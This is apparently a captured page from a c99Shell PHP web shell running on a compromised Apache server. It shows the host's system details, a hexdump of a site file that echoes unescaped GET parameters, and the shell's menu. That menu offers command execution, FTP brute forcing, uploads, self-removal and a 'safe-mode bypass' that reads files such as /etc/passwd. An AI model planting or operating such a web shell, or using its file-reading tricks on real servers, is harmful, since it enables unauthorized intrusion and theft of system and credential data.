110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reportEregis111/ drwxr-xr-x Free 52.64 GB of 127.8 GB (41.18%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/ drwxr-xr-x
Free 52.64 GB of 127.8 GB (41.18%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: R702.php (761 B) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/reportEregis111/R702.php
Size	761 B
MD5	8677d08a89cab91f633867cb76cf3a89
Owner/Group	root/root
Perms	-rw-r--r--
Create time	13/02/2021 08:35:39
Access time	06/07/2024 17:50:13
MODIFY time	24/10/2018 19:29:02

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8

3C 3F 70 68 70 0A 73 65 73 73 69 6F 6E 5F 73 74 61 72 74 28 29 3B 0A 65
72 72 6F 72 5F 72 65 70 6F 72 74 69 6E 67 28 45 5F 41 4C 4C 29 3B 0A 69
6E 63 6C 75 64 65 28 22 50 46 42 43 2F 46 6F 72 6D 2E 70 68 70 22 29 3B
0A 0A 69 66 28 69 73 73 65 74 28 24 5F 50 4F 53 54 5B 22 66 6F 72 6D 22
5D 29 29 20 7B 0A 09 46 6F 72 6D 3A 3A 69 73 56 61 6C 69 64 28 24 5F 50
4F 53 54 5B 22 66 6F 72 6D 22 5D 29 3B 0A 09 68 65 61 64 65 72 28 22 4C
6F 63 61 74 69 6F 6E 3A 20 22 20 2E 20 24 5F 53 45 52 56 45 52 5B 22 50
48 50 5F 53 45 4C 46 22 5D 29 3B 0A 09 65 78 69 74 28 29 3B 09 0A 7D 0A
69 6E 63 6C 75 64 65 28 22 68 65 61 64 65 72 2E 70 68 70 22 29 3B 0A 24
76 65 72 73 69 6F 6E 20 3D 20 66 69 6C 65 5F 67 65 74 5F 63 6F 6E 74 65
6E 74 73 28 22 76 65 72 73 69 6F 6E 22 29 3B 0A 3F 3E 0A 09 3C 75 6C 20
63 6C 61 73 73 3D 22 62 72 65 61 64 63 72 75 6D 62 22 3E 0A 09 09 3C 69
6D 67 20 73 72 63 3D 22 69 6D 67 2F 68 6F 6D 65 2E 70 6E 67 22 20 77 69
64 74 68 3D 22 33 32 22 20 68 65 69 67 68 74 3D 22 33 32 22 3E 20 26 6E
62 73 70 3B 26 6E 62 73 70 3B 3C 62 3E BC D9 E9 E0 A2 E9 D2 E3 AA E9 A7
D2 B9 C3 D0 BA BA 20 3A 3A 3C 2F 62 3E 26 6E 62 73 70 3B 26 6E 62 73 70
3B 3C 62 3E 49 44 3A 3C 2F 62 3E 26 6E 62 73 70 3B 3C 3F 3D 24 5F 47 45
54 5B 27 55 73 65 72 27 5D 3F 3E 20 3C 66 6F 6E 74 20 73 69 7A 65 3D 22
36 22 3E 3C 73 70 61 6E 20 63 6C 61 73 73 3D 22 6C 61 62 65 6C 20 6C 61
62 65 6C 2D 69 6E 66 6F 22 3E 3C 3F 3D 24 5F 47 45 54 5B 27 6E 61 6D 65
27 5D 3F 3E 3C 2F 73 70 61 6E 3E 3C 2F 66 6F 6E 74 3E 0A 09 3C 2F 75 6C
3E 0A 09 3C 73 63 72 69 70 74 3E 0A 09 09 66 75 6E 63 74 69 6F 6E 20 67
6F 42 61 63 6B 28 29 20 7B 0A 09 09 09 77 69 6E 64 6F 77 2E 68 69 73 74
6F 72 79 2E 62 61 63 6B 28 29 3B 0A 09 09 7D 0A 09 3C 2F 73 63 72 69 70
74 3E 0A 3C 69 66 72 61 6D 65 20 73 72 63 3D 22 68 74 74 70 73 3A 2F 2F
61 64 6D 69 6E 69 73 74 65 72 2E 70 69 2E 61 63 2E 74 68 2F 6F 70 65 6E
70 69 2F 69 6E 64 65 78 2E 70 68 70 2F 65 72 65 73 65 61 72 63 68 65 72
2F 65 78 70 6F 72 74 5F 6D 74 2F 72 70 74 35 37 5F 6D 74 5F 67 72 61 70
68 46 6F 72 50 65 72 63 65 6E 74 4F 66 59 65 61 72 2F 32 31 22 20 68 65
69 67 68 74 3D 22 36 30 30 22 20 77 69 64 74 68 3D 22 31 30 30 25 22 3E
3C 2F 69 66 72 61 6D 65 3E 0A 3C 3F 70 68 70 0A 69 6E 63 6C 75 64 65 28
22 66 6F 6F 74 65 72 2E 70 68 70 22 29 3B 0A 3F 3E

<?php session_start(); e
rror_reporting(E_ALL); i
nclude("PFBC/Form.php");
if(isset($_POST["form"
])) { Form::isValid($_P
OST["form"]); header("L
ocation: " . $_SERVER["P
HP_SELF"]); exit(); }
include("header.php"); $
version = file_get_conte
nts("version"); ?> <ul
class="breadcrumb"> <i
mg src="img/home.png" wi
dth="32" height="32"> &n
bsp; <b>јЩйаўйТгЄй§
Т№ГРєє ::</b> &nbsp
;<b>ID:</b> <?=$_GE
T['User']?> <font size="
6"><span class="label la
bel-info"><?=$_GET['name
']?></span></font> </ul
> <script> function g
oBack() { window.hist
ory.back(); } </scrip
t> <iframe src="https://
administer.pi.ac.th/open
pi/index.php/eresearcher
/export_mt/rpt57_mt_grap
hForPercentOfYear/21" he
ight="600" width="100%">
</iframe> <?php include(
"footer.php"); ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0083 ]--